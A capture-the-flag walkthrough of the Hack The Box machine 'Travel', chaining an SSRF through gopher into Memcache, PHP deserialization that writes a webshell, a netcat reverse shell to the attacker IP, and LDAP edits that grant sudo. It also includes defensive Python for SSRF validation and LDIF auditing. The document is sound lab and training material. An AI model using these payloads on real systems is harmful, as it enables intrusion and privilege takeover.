[Meachines] [Hard] Travel Git+SSRF+memcache+TRP00F+LDIF-SSH privilege escalation
Word count: 955 | 2025-08-22 12:23:06
Travel.HTB full penetration-testing walkthrough
Information gathering
Initial scan
- Target IP: 10.10.10.189
- Open ports:
  - 22/tcp: OpenSSH 8.2p1 Ubuntu 4
  - 80/tcp: nginx 1.17.6 (http)
  - 443/tcp: nginx 1.17.6 (https)
Certificate information:
- Domains: www.travel.htb, blog.travel.htb, blog-dev.travel.htb
- Validity: 2020-04-23 to 2030-04-21
Hosts file configuration
echo '10.10.10.189 travel.htb' >> /etc/hosts
The subdomains found below (blog.travel.htb, blog-dev.travel.htb) have to resolve as well, so add them to the same hosts entry.
Subdomain enumeration
The following subdomains were found:
- http://ssl.travel.htb
- http://blog.travel.htb
- http://blog-dev.travel.htb
Exploiting the Git information leak
Downloading the Git repository
Use the GitDumper tool to download the exposed .git directory:
./dump.sh http://blog-dev.travel.htb/.git/ res
Restoring the Git repository
cd res
git reset --hard
Key code analysis
The file rss_template.php was found; it contains an SSRF vulnerability:
// Vulnerable: the raw query string is split on '=' and the LAST piece is used
// as the feed URL, with no scheme or host validation, so any URL reachable
// from the server (including gopher:// to local services) is fetched.
$url = $_SERVER['QUERY_STRING'];
if(strpos($url, "custom_feed_url") !== false){
    $tmp = (explode("=", $url));
    $url = end($tmp);
} else {
    $url = "http://www.travel.htb/newsfeed/customfeed.xml";
}
$feed = get_feed($url);
SSRF and Memcache exploitation
Identifying the Memcache cache key
WordPress's SimplePie class caches RSS feeds in Memcache; the cache key is built as:
md5(md5(feed_url) + ":spc")
Calculation example:
echo -n "$(echo -n 'http://travel.htb/newsfeed/customfeed.xml' | md5sum | cut -d' ' -f1):spc" | md5sum
The key is computed over the exact URL string the server fetches, so the hostname and path must match what the code requests byte for byte.
Exploiting the Gopher protocol
Use the Gopherus tool to generate the Memcache payload:
gopherus --exploit phpmemcache
Try injecting a test key into Memcache:
curl 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20success%0d%0a'
127.0.0.1 turns out to be filtered; 127.1 is an alternative spelling of the same loopback address that the filter does not match:
curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://127.1:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20success%0d%0a'
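Added example (Python; not code from the write-up or from the theme). The first half re-implements the query-string parse from rss_template.php next to a hardened version that decodes the query properly and allowlists scheme and host, with a loopback check that treats 127.1 the way libc does, which is exactly what a string compare against "127.0.0.1" misses. The second half is for log triage: given a custom_feed_url value as it appears percent-encoded in the access log, it reconstructs the memcached commands the gopher request delivers, checks the declared byte count against the data line, and flags values that are serialized PHP objects. The host allowlist, the xct_ key prefix and the sample query strings are assumptions for this example.

```python
import hashlib
import ipaddress
import re
import socket
from urllib.parse import parse_qs, unquote, urlsplit

DEFAULT_FEED = "http://www.travel.htb/newsfeed/customfeed.xml"
ALLOWED_FEED_HOSTS = {"www.travel.htb"}   # assumed allowlist for this example
ALLOWED_SCHEMES = {"http", "https"}
MEMCACHED_PORT = 11211
SET_RE = re.compile(r"^set (\S+) (\d+) (\d+) (\d+)$")  # set <key> <flags> <exptime> <bytes>


def naive_feed_url(query_string: str) -> str:
    """Mirror of the vulnerable PHP: if the raw query string mentions
    custom_feed_url, whatever follows the LAST '=' becomes the URL, still
    percent-encoded and with no scheme or host check."""
    if "custom_feed_url" in query_string:
        return query_string.split("=")[-1]
    return DEFAULT_FEED


def is_loopback_host(host: str) -> bool:
    """True for 127.0.0.1 and ::1, and also for the short spellings libc
    accepts ('127.1', '127.0.1', '2130706433') that a literal string
    comparison against '127.0.0.1' misses."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        pass
    try:
        return socket.inet_aton(host)[0] == 127
    except OSError:
        return False


def validate_feed_url(query_string: str) -> tuple:
    """Hardened replacement: decode the query properly, then allow only
    http(s) to an allowlisted, non-loopback host. Returns (ok, url_or_reason)."""
    params = parse_qs(query_string, keep_blank_values=True)
    url = params.get("custom_feed_url", [DEFAULT_FEED])[0]
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if host not in ALLOWED_FEED_HOSTS or is_loopback_host(host):
        return False, f"host not allowed: {host!r}"
    return True, url


def simplepie_cache_key(feed_url: str, prefix: str = "xct_") -> str:
    """Key SimplePie derives from the feed URL, md5(md5(url) . ':spc'), with
    the key prefix seen in the write-up (assumed to be a fixed prefix)."""
    inner = hashlib.md5(feed_url.encode()).hexdigest()
    return prefix + hashlib.md5((inner + ":spc").encode()).hexdigest()


def decode_gopher_memcache(url: str) -> dict:
    """Given a gopher:// URL as logged (still percent-encoded), reconstruct what
    memcached receives: the gopher client sends the percent-decoded selector
    with its first character (the item type, '_') removed. Each 'set' is
    checked for a matching data length and for a serialized PHP object."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    sel = parts.path.lstrip("/")
    selector = unquote(sel[1:]) if sel else ""
    lines = selector.split("\r\n")
    report = {"host": host, "port": parts.port,
              "loopback": is_loopback_host(host),
              "memcached": parts.port == MEMCACHED_PORT,
              "sets": [], "problems": []}
    i = 0
    while i < len(lines):
        m = SET_RE.match(lines[i])
        if not m:
            i += 1
            continue
        key, declared = m.group(1), int(m.group(4))
        data = lines[i + 1] if i + 1 < len(lines) else ""
        actual = len(data.encode())
        report["sets"].append({"key": key, "declared": declared, "actual": actual, "data": data})
        if actual != declared:
            report["problems"].append(f"{key}: declared {declared} bytes, data line is {actual}")
        if re.match(r'^O:\d+:"', data):
            report["problems"].append(f"{key}: value is a serialized PHP object")
        i += 2
    return report


if __name__ == "__main__":
    # Constructed sample query strings; the second is the test payload above.
    for q in ("custom_feed_url=http://www.travel.htb/newsfeed/customfeed.xml",
              "custom_feed_url=gopher://127.1:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20success%0d%0a"):
        print(validate_feed_url(q))
        print(decode_gopher_memcache(naive_feed_url(q)))
```

Run over the two payloads in this section, the decoder reports a loopback target on port 11211 with a consistent `set`, and for the serialized-object payload adds an object-injection finding; a WAF rule that only matches the string 127.0.0.1 sees neither.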
PHP deserialization attack
- Create the malicious serialized object:
<?php
// Stand-in class with the same name and property names as the theme's
// TemplateHelper, so unserialize() on the server maps the string onto it.
class TemplateHelper{
    public $file;
    public $data;
    public function __construct() {
        $this->file = 'shell.php';                         // file name to be written
        $this->data = '<?php system($_GET["cmd"]); ?>';    // file contents
    }
}
$obj = new TemplateHelper();
echo serialize($obj);
?>
- Inject it into Memcache:
curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://127.1:11211/_%0d%0aset%20xct_c2a6e200369c218c55ee3bd085c37104%204%200%20102%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%0d%0a'
- Trigger the deserialization:
curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=http://10.10.16.24/customfeed.xml'
- Reach the webshell:
http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php?cmd=whoami
- Reverse shell:
curl http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.16.24%20443%20%3E%2Ftmp%2Ff
Privilege escalation to lynik-admin
Obtaining WordPress credentials
WordPress credentials found:
- 用户名: wp
- 密码: fiFtDDV9LYe8Ti
Crack the hashes with hashcat (mode 400 is phpass, the WordPress password hash format):
hashcat -m 400 hashes.txt rockyou.txt --force
lynik-admin credentials obtained:
- 用户名: lynik-admin
- 密码: 1stepcloser
Get the user flag:
c721ef5c8698054199131dea512ed500
Port forwarding with TRP00F
Use the TRP00F tool to set up a TCP reflected port forward:
python trp00f.py --lhost 10.10.16.24 --lport 10022 --rhost 10.10.16.24 --rport 443 --http 10091
LDAP privilege escalation
LDAP information gathering
Check the configuration files (.ldaprc holds the LDAP client's defaults; .viminfo records recently edited files and command history):
cat .ldaprc
cat .viminfo
Verify LDAP access:
ldapsearch -x -w Theroadlesstraveled
Check the SSH configuration (non-comment lines only):
cat /etc/ssh/sshd_config | grep -v '^#' | grep .
LDAP modification attack
- Create the eugene user's SSH key entry: add the ldapPublicKey objectClass and an sshPublicKey attribute to uid=eugene (the LDIF modifies the existing entry):
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKh5j38dxYGBQEgZCAb6+6mzvGnTXX/cw/YqIG7bU2NL map@map
Apply the change:
ldapadd -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/eugene.ldif
- Change the user's primary group (gid 27 is the sudo group on Ubuntu):
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: gidNumber
gidNumber: 27
Apply the change:
ldapadd -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/eugene_gid.ldif
- Set the user's password:
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: userPassword
userPassword: password123
Apply the change:
ldapadd -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/eugene_pass.ldif
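Added example (Python; not part of the write-up): a small LDIF reader plus an audit of the modify records above, the kind of check a directory administrator would run over proposed LDIF, or over the server's audit log, when an administrative bind like cn=lynik-admin is allowed to write to user entries. In an environment where login and group membership are sourced from LDAP it flags the three changes that matter here: an sshPublicKey being added, userPassword being replaced by the binding identity rather than the user, and gidNumber being moved to a privileged group (gid 27 is the sudo group on Ubuntu, which is what makes the later sudo su possible). The sample LDIF is the three records from this section joined into one file; the attribute policy and the privileged-gid table are assumptions.

```python
import base64
import re

# Constructed sample: the three modify records from this section, joined into
# one LDIF file (records are separated by a blank line).
SAMPLE_LDIF = """\
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKh5j38dxYGBQEgZCAb6+6mzvGnTXX/cw/YqIG7bU2NL map@map

dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: gidNumber
gidNumber: 27

dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: userPassword
userPassword: password123
"""

# Assumed review policy: attributes whose change alters who can log in or what
# they can do once logged in.
SENSITIVE_ATTRS = {
    "sshpublickey": "SSH key added/changed: grants interactive login as this uid",
    "userpassword": "password set by the binding identity, not by the user",
    "objectclass": "ldapPublicKey objectClass added: entry can now carry SSH keys",
}
PRIVILEGED_GIDS = {0: "root", 27: "sudo (Ubuntu default)"}  # assumed table


def _decode_value(raw: str) -> str:
    """'attr:: <base64>' form versus the plain 'attr: value' form."""
    if raw.startswith(":"):
        return base64.b64decode(raw[1:].strip()).decode("utf-8", "replace")
    return raw.strip()


def parse_ldif(text: str) -> list:
    """Minimal LDIF reader for changetype: modify records. Each record becomes
    {'dn': str, 'changetype': str, 'ops': [(op, attr, [values]), ...]}.
    Handles folded lines (leading space), comments and the '-' separator."""
    records = []
    for block in re.split(r"\n[ \t]*\n", text.strip()):
        lines = []
        for line in block.splitlines():
            if line.startswith(" ") and lines:
                lines[-1] += line[1:]          # unfold continuation line
            elif line and not line.startswith("#"):
                lines.append(line)
        rec = {"dn": "", "changetype": "add", "ops": []}
        current = None
        for line in lines:
            if line.strip() == "-":
                current = None               # end of one modify operation
                continue
            name, _, raw = line.partition(":")
            value, lname = _decode_value(raw), name.strip().lower()
            if lname == "dn":
                rec["dn"] = value
            elif lname == "changetype":
                rec["changetype"] = value.lower()
            elif lname in ("add", "replace", "delete") and current is None:
                current = (lname, value, [])   # value is the attribute name
                rec["ops"].append(current)
            elif current is not None:
                current[2].append(value)       # attribute value for this op
        records.append(rec)
    return records


def audit_changes(records: list) -> list:
    """Return (dn, op, attr, reason) for each sensitive change in modify records."""
    findings = []
    for rec in records:
        if rec["changetype"] != "modify":
            continue
        for op, attr, values in rec["ops"]:
            a = attr.lower()
            if a == "gidnumber":
                hit = [int(v) for v in values if v.isdigit() and int(v) in PRIVILEGED_GIDS]
                if hit:
                    findings.append((rec["dn"], op, attr,
                                     f"primary group set to gid {hit[0]} = {PRIVILEGED_GIDS[hit[0]]}"))
            elif a == "objectclass":
                if any(v.lower() == "ldappublickey" for v in values):
                    findings.append((rec["dn"], op, attr, SENSITIVE_ATTRS[a]))
            elif a in SENSITIVE_ATTRS:
                findings.append((rec["dn"], op, attr, SENSITIVE_ATTRS[a]))
    return findings


if __name__ == "__main__":
    for dn, op, attr, reason in audit_changes(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn}\n  {op} {attr}: {reason}")
```

The parser keeps each modify operation as a tuple so the audit can reason about the operation (add versus replace) as well as the attribute; on the sample it produces four findings, one per change the write-up makes, and the gidNumber finding names the sudo group explicitly.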
Getting root
sudo su
Get the root flag:
9e19cd0d257e88a10da5e8c0c3a92bac1